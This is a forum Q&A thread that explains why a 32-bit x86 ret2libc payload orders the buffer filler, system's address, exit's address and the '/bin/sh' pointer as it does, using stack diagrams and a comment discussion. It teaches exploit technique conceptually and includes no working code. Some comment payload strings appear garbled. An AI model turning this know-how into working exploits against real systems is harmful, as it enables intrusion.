Understanding ret2libc return address location

Question

I recently was studying x86 buffer overflows + ret2libc attacks from https://www.ret2rop.com/2018/08/return-to-libc.html and I noticed the order is as follows:

bytes to fill buffer + address of system + return address for system/address of exit + address of "/bin/sh"

I am confused to as to why the return address (the PC/EIP returns to after calling and executing system's code) passed to system is located before the address of /bin/sh on the stack. From what I've read the return address should be directly after /bin/sh/ the argument to system but every example I've seen follows this overflow order when using ret2libc attacks. Is there something I'm missing in how procedures/functions return/where they return? Why is the return address before /bin/sh and not after it inside the buffer-overflow payload?

plonk · Accepted Answer · 2020-11-26T10:04:00.510

2

This is because on x86, stacks grow downwards (towards lower addresses), but buffers are filled upwards (towards higher addresses):

When writing out of the buffer, you are clobbering the return address of the stack frame above, at a higher address.

The ret instruction will then pop the return address off the stack and continue execution at the beginning of system. Then, system will pop its arguments off the stack, and upon returning, pop the address of the next function off the stack, i.e. the stack shrinks as you go through the chain, and the stack pointer grows larger.

The reason that the address of /bin/sh can be written on the stack lies in the calling convention used by gcc on x86_32 linux, which is very close to the System V calling convention (see Figure 3-15). In contrast, on x86_64, the first arguments are passed in registers (rdi, rsi, rcx), so you would need a pop rdi; ret gadget before you can return to system.

To understand the order of the values written to the stack, let's look at a single stack frame:

         high addresses

       +----------------+
       |                |
       | arguments      |
       |                |
       +----------------+
esp -> | return address |
       +----------------+
       |                |
       | locals         |
       |                |
       +----------------+

         low addresses

Putting this together to a payload, we get:

         high addresses

       +----------------+                -+
       | arg0           |                 |
       +----------------+                 | stack frame of system
       | return address | exit            |
       +----------------+                -+
esp -> | return address | system          |
       +----------------+                 |
       |                |  ^              | stack frame of victim
       | buffer         |  | overflow     |
       |                |  +              |
       + . . . . . . . .+                 :

         low addresses

The buffer being overflown is a local buffer in the victim function, and its return address gets overwritten. The ret instruction will pop the return address off the stack into eip, so execution will continue in system.

At this point, the stack looks like this, with space below esp usable by system for its locals (actually, the diagram is not quite correct, as system pushes locals, the stack pointer will of course decrease):

         high addresses

       +----------------+                -+
       | arg0           |                 |
       +----------------+                 | stack frame of system
esp -> | return address | exit            |
       +----------------+                 |
       |                |                 |
       | locals         |                 |
       |                |                 |
       + . . . . . . . .+                 :

         low addresses

To access the argument, system will use the [reg+displacement] addressing mode, to access [esp+4]. At the end of its execution, it will call ret, which will continue execution in exit.

edited Nov 26 '20 at 10:04

answered Nov 26 '20 at 07:58

plonk

633
4
13

`Then, system will pop its arguments off the stack ` Confuses me a bit, could you explain this a bit more? – asd_665 Nov 26 '20 at 08:15
sure! I'll expand my answer. – plonk Nov 26 '20 at 08:16
What confuses me is the order in which `system` `pop`s arguments off the stack, is the `return address` for `exit` popped first? Or should arguments be passed in reverse order? Does this apply to every function/procedure? – asd_665 Nov 26 '20 at 08:20
I understand for instance when calling `printf` from `assembly` you would need to first `push` the string you wish to print to `stdout` first then `push` the `format string specifier` string onto the stack, to be popped in the correct order by `printf`. I just don't understand how this applies to `return` addresses logically/in the logic of the payload. – asd_665 Nov 26 '20 at 08:27
Why isn't `system` treating the `return address` of `exit` as the first argument? If `pop` increases the stack pointer after the overflown `return address` with address of `system` is called shouldn't the argument be the `return address` to exit and not the `/bin/sh` memory address? I just don't understand why the payload is ` + + <'/bin/sh'>` and not ` + <'/bin/sh'> + ` – asd_665 Nov 26 '20 at 08:45
1

I'm still confused to as to why `exit` is before `/bin/sh` in the payload and not vice versa. – asd_665 Nov 26 '20 at 08:57
The issue is how confusing this is and also that the exploit works using the format ` + + ` but doesn't work when using ` + + ` so I think we're missing something. – asd_665 Nov 26 '20 at 09:07
yes - I think I messed something up in my answer - I got the stack frames the wrong way around. Let me correct that... – plonk Nov 26 '20 at 09:07
@asd_665 Thanks for pointing that out - seems like the same thing confused me for a moment! It's been a while since I've looked at the 32 bit stuff. I've deleted my misleading comments here - does the last edit clear things up a bit? – plonk Nov 26 '20 at 09:27
In your answer can you explain the second diagram in `x86` to make it clear and concise what is happening with `eip` and the `return address`es, according to your diagrams. – asd_665 Nov 26 '20 at 09:36
Why does the two return addresses in diagram 2 have to be adjacent/directly located by each other? How does `eip` know where to return to within `system`? Is that logic performed by the `[esp+4]` instruction? – asd_665 Nov 26 '20 at 10:15
at the entry to `system`, the stack pointer `esp` points to the return address. While `system` executes it can decrease `esp` as it pushes locals to the stack, but needs to pop all of them again before it exits, so `esp` will point to the return address again when the `ret` instruction is executed. The `ret` instruction is equivalent to `eip <- [esp]; esp <- esp + 4`. After the `ret`, the stack pointer will therefore point to the next return address. – plonk Nov 26 '20 at 10:24
1

`You extremely helped me understand how functions like `gets` and `system` access arguments on the stack! Hopefully others who were confused find this answer! – asd_665 Nov 26 '20 at 10:30

Understanding ret2libc return address location

1 Answers1